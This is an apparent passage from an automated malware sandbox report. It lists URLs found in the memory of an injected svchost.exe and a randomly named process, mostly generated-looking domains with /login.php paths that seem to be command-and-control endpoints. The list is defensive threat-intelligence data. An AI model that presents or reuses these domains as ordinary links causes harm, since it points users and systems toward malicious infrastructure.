00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydyv.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076266061.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076877673.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583628686.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytov.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677370305.0000000005A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyp.com/
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywoq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638005.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjyl.com/login.php
Source: svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733345122.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/http://lyryled.com/http://lysyxux.com/0
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/http://puvymul.com/
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytag.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxig.com/login.php
